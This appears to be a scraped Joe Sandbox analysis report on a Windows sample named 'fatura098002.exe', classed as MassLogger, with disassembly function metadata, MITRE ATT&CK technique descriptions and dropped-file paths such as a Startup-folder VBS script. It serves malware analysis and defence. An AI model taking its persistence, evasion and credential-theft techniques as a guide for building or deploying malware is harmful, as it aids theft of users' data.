Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: _wcslen
String ID: 3, 3, 16, 1
API String ID: 176396367-3042988571
Opcode ID: 03e8c4b3329bdddc055b49e66b239c2742bbd9b38d5ef9c8231579595139c034
Instruction ID: a216f3a3e9f8479b3a38b0e73676a596183ce47250c07631584695c005ad2bc9
Opcode Fuzzy Hash: 03e8c4b3329bdddc055b49e66b239c2742bbd9b38d5ef9c8231579595139c034
Instruction Fuzzy Hash: 4AE02B422442B060923932B9ACC5A7F5689CFC5760734182FF9CAC2266EADCDDD1D3A0

Function 00760B15 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00760B23

Strings

AutoIt, xrefs: 00760B17
Error allocating memory., xrefs: 00760B1C

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: Message
String ID: AutoIt$Error allocating memory.
API String ID: 2030045667-4017498283
Opcode ID: 33c2ea39be3944ec046c48a94af245bfa96e77ba6af06a6664465f6ab93c42b1
Instruction ID: 4d6644b7635bcca4fb9b49b0782a37d3ee0da2828f454b0d0c967f49848b4ab1
Opcode Fuzzy Hash: 33c2ea39be3944ec046c48a94af245bfa96e77ba6af06a6664465f6ab93c42b1
Instruction Fuzzy Hash: D0E0D831244318B6DA1137947C0BFC97B848F05B20F10446AFB88554C38AEA349006F9

Function 00720D42 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 0071F7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(007D0A88,00000000,007D0A74,00720D71,?,?,?,0070100A), ref: 0071F7CE

IsDebuggerPresent.KERNEL32(?,?,?,0070100A), ref: 00720D75
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0070100A), ref: 00720D84

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00720D7F

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 55579361-631824599
Opcode ID: f29998382c91e652c16dad16990121a8c80bb31b7b3dd1a875586ef778e368e6
Instruction ID: 99a68a1f218288c8cdc85a82c839e0bf2a58d2bae5f49850e7525844b3621e12
Opcode Fuzzy Hash: f29998382c91e652c16dad16990121a8c80bb31b7b3dd1a875586ef778e368e6
Instruction Fuzzy Hash: 00E06D702013118BDB209FB8E8083427BE0BB00750F00893EE482C6692DBBCE4458BE1

Function 0071E398 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 0071E3D5

Strings

8%}, xrefs: 0071E3CA
0%}, xrefs: 0071E3B5

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: Init_thread_footer
String ID: 0%}$8%}
API String ID: 1385522511-2688785392
Opcode ID: f642bbd5c47ea6816f1ddd00b5b0d01a9769f73c86e008d6e278c9f1d701e7d2
Instruction ID: 0a4def383946e59a06b7d36d1f2d692c29d79662ac50a2779ae418292758aed8
Opcode Fuzzy Hash: f642bbd5c47ea6816f1ddd00b5b0d01a9769f73c86e008d6e278c9f1d701e7d2
Instruction Fuzzy Hash: ADE08631419A24CBC704971CB85DEC83375BB55720B5052F7E923872D3DB3C689386A9

Function 00773017 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?,00000001), ref: 0077302F
GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00773044

Strings

aut, xrefs: 00773038

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: 58555908a0eae7fdf910019e0645952c19ca2b55ee7f7378bf639a68c87b118c
Instruction ID: f35556ee28e8781fd0cd024ca35b8a25a8bbc306aecfa5dc621937fabfec24cf
Opcode Fuzzy Hash: 58555908a0eae7fdf910019e0645952c19ca2b55ee7f7378bf639a68c87b118c
Instruction Fuzzy Hash: E5D05EB250032877DE20A7A4AC4EFCB3B6CEB04750F0042A2B655E6091DAB89985CBE4

Function 0075D21C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 0075D220

Strings

X64, xrefs: 0075D2A8
%.3d, xrefs: 0075D22B

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: LocalTime
String ID: %.3d$X64
API String ID: 481472006-1077770165
Opcode ID: 6d90e8d5c912c073f3fc5a872004ec8e5df3380e0f34689db0b2ef727c569fc9
Instruction ID: 8b46af6b1154d82e5235f85036528b7790f7dfcfb683b59993885076f2a355d0
Opcode Fuzzy Hash: 6d90e8d5c912c073f3fc5a872004ec8e5df3380e0f34689db0b2ef727c569fc9
Instruction Fuzzy Hash: D5D012B1C08148E9CB7097E0CC499F9B37CBB08302F508456FD0691040D6ACDD4CAB61

Function 00792356 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0079236C
PostMessageW.USER32(00000000), ref: 00792373

Part of subcall function 0076E97B: Sleep.KERNEL32 ref: 0076E9F3

Strings

Shell_TrayWnd, xrefs: 00792365

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 82aad4ed18a66b6b033e0f63d45de9f2b55826ec3905e50267d0dab51303d1d3
Instruction ID: e0ccd6cefb0ab1fc4cf2c5ccd5152a93639d0a0b2a863df0c39432ebc31f2698
Opcode Fuzzy Hash: 82aad4ed18a66b6b033e0f63d45de9f2b55826ec3905e50267d0dab51303d1d3
Instruction Fuzzy Hash: 14D0C976381310BAEA65A7709C4FFC666249B04B10F11896A7646AA1D4C9A8B8128A58

Function 00792322 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0079232C
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 0079233F

Part of subcall function 0076E97B: Sleep.KERNEL32 ref: 0076E9F3

Strings

Shell_TrayWnd, xrefs: 00792325

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: b93fdab98c36926e02c0b8c5d03354e463c940a94061982454d6da25ac38e4df
Instruction ID: 302a4534075deba0410599d960366077678e17f653b1ed1a674b18e21a90076e
Opcode Fuzzy Hash: b93fdab98c36926e02c0b8c5d03354e463c940a94061982454d6da25ac38e4df
Instruction Fuzzy Hash: C6D01276394310B7EA64B770DC4FFC67A249F00B10F11896B7746AA1D4C9F8B812CA58

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report fatura098002.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: MassLogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Halitherses\gehlenite.exe

C:\Users\user\AppData\Local\Temp\ageless

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\gehlenite.vbs

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Windows Analysis Report
fatura098002.exe

Function 007042DE Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235
libraryloaderCOMMON

Function 00703170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145
timewindowregistryCOMMON

Function 007042A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Function 00742BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62
COMMON

Function 0070344D Relevance: 19.5, APIs: 6, Strings: 5, Instructions: 201
registryCOMMON

Function 0074065B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Function 00702B83 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63
windowregistryCOMMON

Function 00702CD4 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 53
registrywindowclipboardCOMMON

Function 00FCFBE8 Relevance: 10.7, APIs: 7, Instructions: 151
fileCOMMON

Function 00702C63 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Function 007010F3 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 153
comCOMMON

Function 00838720 Relevance: 7.7, APIs: 5, Instructions: 206
librarymemoryloaderCOMMON

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
